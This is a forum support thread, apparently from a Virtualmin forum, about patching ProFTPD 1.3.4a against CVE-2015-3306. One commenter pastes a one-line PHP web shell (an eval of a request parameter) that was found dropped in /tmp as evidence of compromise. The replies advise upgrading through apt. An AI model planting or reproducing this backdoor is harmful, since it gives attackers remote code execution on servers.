proftpd exploit

I've got ProFTPD 1.3.4a Server (Debian)

the exploit https://security-tracker.debian.org/tracker/CVE-2015-3306

needed is clear instructions on howto upgrade proftpd

thanks guys

Status: 
Active

Comments

root@tools:/tmp# more /etc/*-release :::::::::::::: /etc/lsb-release :::::::::::::: DISTRIB_ID=Ubuntu DISTRIB_RELEASE=12.04 DISTRIB_CODENAME=precise DISTRIB_DESCRIPTION="Ubuntu 12.04.5 LTS" :::::::::::::: /etc/os-release :::::::::::::: NAME="Ubuntu" VERSION="12.04.5 LTS, Precise Pangolin" ID=ubuntu ID_LIKE=debian PRETTY_NAME="Ubuntu precise (12.04.5 LTS)" VERSION_ID="12.04"

Virtualmin version 4.17.gpl

in /tmp

-rw-r--r-- 1 proftpd nogroup 81 May 25 09:17 '97055

<?php
 @eval($_REQUEST[e]);
?>

'

You should be able to run apt-get install proftpd , assuming that Debian has released an updated package.

Howdy -- yeah, the ProFTPd package isn't something we supply, but as soon as Debian updates their package, you'll be able to upgrade to it using apt as Jamie showed above.